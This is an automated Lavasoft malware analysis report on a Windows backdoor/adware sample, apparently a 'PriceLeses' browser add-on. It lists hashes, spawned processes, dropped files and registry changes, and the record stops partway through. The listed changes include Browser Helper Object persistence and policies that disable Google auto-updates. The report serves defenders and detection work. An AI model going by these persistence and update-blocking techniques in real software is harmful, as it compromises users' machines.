Gen:Variant.Adware.Symmi.49922 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1cae3ce62857807fb52a3fa4bf6a6107
SHA1: e8ce1d3840b4169bedf695bf6a63a25655297063
SHA256: f7fb614d095924f9d4f4871303351178dc4d88bd0199dd0c1bfaadb0ecb3dc81
SSDeep: 24576:e0INoLhRU4UxuXI8q03ZY9z/WKL25xfCXfTx4U:e3yLj5XIOY9zO PTx
Size: 1356800 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Cinema Plus2.7gV08.01
Created at: 2012-09-17 10:50:48
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516
The Backdoor injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a (0 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (0 bytes)
The process %original file name%.exe:1664 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (281 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (0 bytes)
The process %original file name%.exe:1252 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (518 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (0 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195 (0 bytes)
The process %original file name%.exe:596 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2.ini (0 bytes)
The process TyHelpTFUO.exe:1516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
Registry activity
The process mscorsvw.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process regsvr32.exe:388 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 82 81 9D 95 3C BB AF 7E 3E C4 E6 DF DD 99 0A"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CurVer]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{ad7efdf6-aec2-4b6b-b677-0b880379eb76}" = "1"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"
[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_]
"(Default)" = "YoUtuBeeAdBlockke"
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"
"NoExplorer" = "1"
The Backdoor deletes the following registry key(s):
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\Programmable]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
The process regsvr32.exe:1776 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_]
"(Default)" = "PriceLeses"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9]
"(Default)" = "PriceLeses"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}]
"(Default)" = "IRegistry"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}" = "1"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\HELPDIR]
"(Default)" = "%Program Files%\PriceLeses"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll"
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E3 FF 45 93 DB FE BC 0D F2 05 18 15 7A C9 29"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}]
"(Default)" = "ILocalStorage"
[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"Version" = "1.0"
[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CurVer]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"
[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}]
"(Default)" = "IPlaghinMein"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"
"NoExplorer" = "1"
The Backdoor deletes the following registry key(s):
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\Programmable]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
The process rundll32.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E EB F7 3C 05 22 3E 15 AE CC 81 7C 89 51 FC 3A"
The process rundll32.exe:1324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"e46c271e" = "///%"
"c24899a6" = "Vx/g/CD/Mx////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"27ddcf6f" = "///%"
"a0743acc" = "N/////%%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"bbf88800" = "///%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"
"f0bf0bde" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"340d3099" = "/P////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"65114b36" = "Vl/l////"
"587b5709" = "V/////%%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 40 1D 03 0E E7 F9 2E BE 0E FB C2 96 A3 A8 F0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"c99a5f5c" = "///%"
"a2e3b941" = "///%"
"3c09c42b" = "///%"
"72758a5d" = "///%"
"2e22d94e" = "///%"
"d1abcdb6" = "///%"
"f6ad6fa6" = "V/////%%"
"2d71d5ab" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"
The process %original file name%.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"SilentUninstall" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"DisplayName" = "PriceLeses"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"UninstallString" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"ProductName" = "PriceLeses"
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InfoURL" = "http://pricelessorsoft.com"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
